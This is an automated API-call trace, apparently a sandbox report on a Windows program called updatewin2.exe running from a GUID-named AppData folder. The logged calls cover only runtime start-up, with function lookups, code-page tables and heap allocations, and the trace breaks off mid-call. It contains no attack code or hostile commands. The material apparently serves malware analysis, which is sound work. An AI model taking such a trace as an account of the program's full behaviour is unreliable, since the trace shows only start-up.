GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0112.735] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0112.735] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0112.735] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0112.735] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0112.735] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0112.735] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0112.735] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0112.735] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0112.736] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0112.736] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0112.736] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0112.736] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0112.736] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0112.736] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0112.736] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0112.736] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0112.736] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0112.736] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0112.737] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0112.737] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0112.737] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0112.737] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0112.737] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0112.737] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0112.737] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0112.737] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0112.737] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0112.738] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0112.738] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0112.738] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0112.738] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0112.738] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0112.738] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0112.738] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0112.738] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0112.738] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0112.739] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0112.739] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0112.739] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0112.739] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0112.739] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0112.739] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0112.739] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0112.739] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0112.739] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0112.739] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0112.740] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0112.740] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0112.740] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0112.740] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0112.740] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0112.740] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0112.740] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0112.740] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0112.740] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0112.740] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0112.741] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0112.741] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0112.741] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0112.741] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0112.741] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0112.741] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0112.741] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0112.741] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0112.741] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0112.741] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0112.742] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0112.742] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0112.746] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0112.746] atexit (param_1=0x5863d8) returned 0 [0112.747] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5f4 | out: lpSystemTimeAsFileTime=0x18f5f4*(dwLowDateTime=0x1f299ae0, dwHighDateTime=0x1d5fd35)) [0112.747] GetCurrentThreadId () returned 0x9c4 [0112.747] GetCurrentProcessId () returned 0x9b8 [0112.747] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5ec | out: lpPerformanceCount=0x18f5ec*=23297850998) returned 1 [0112.756] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0112.757] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.757] GetLastError () returned 0x57 [0112.758] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.758] GetLastError () returned 0x57 [0112.758] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0112.758] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0112.758] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.758] GetLastError () returned 0x57 [0112.758] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0112.758] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0112.760] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.760] GetLastError () returned 0x57 [0112.760] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.760] GetLastError () returned 0x57 [0112.760] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0112.760] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0112.761] GetProcessHeap () returned 0x570000 [0112.761] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.761] GetLastError () returned 0x57 [0112.761] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0112.761] GetLastError () returned 0x57 [0112.761] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0112.761] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x364) returned 0x59ad00 [0112.762] SetLastError (dwErrCode=0x57) [0112.762] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xc00) returned 0x59b070 [0112.764] GetStartupInfoW (in: lpStartupInfo=0x18f528 | out: lpStartupInfo=0x18f528*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033e0, hStdOutput=0x720d37d6, hStdError=0xfffffffe)) [0112.764] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.764] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0112.764] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.764] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe\" " [0112.764] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe\" " [0112.765] IsValidCodePage (CodePage=0x4e4) returned 1 [0112.765] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f548 | out: lpCPInfo=0x18f548) returned 1 [0112.765] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ee10 | out: lpCPInfo=0x18ee10) returned 1 [0112.765] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.765] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eba8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0112.765] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x18ee24 | out: lpCharType=0x18ee24) returned 1 [0112.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0112.766] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0112.766] GetLastError () returned 0x57 [0112.766] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0112.766] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0112.766] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e948, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0112.766] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f324, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0e\x99Tr`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0112.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0112.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0112.766] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0112.766] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18e968, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0112.766] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f224, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0e\x99Tr`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0112.766] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x80) returned 0x59a3e8 [0112.766] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x417ca8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe")) returned 0x5f [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xc8) returned 0x59c478 [0112.767] RtlInitializeSListHead (in: ListHead=0x417bc8 | out: ListHead=0x417bc8) [0112.767] GetLastError () returned 0x0 [0112.767] GetEnvironmentStringsW () returned 0x59c548* [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xaca) returned 0x59d020 [0112.767] FreeEnvironmentStringsW (penv=0x59c548) returned 1 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x98) returned 0x59c548 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3e) returned 0x59db10 [0112.767] RtlAllocateHeap (HeapHandle=0x570000, 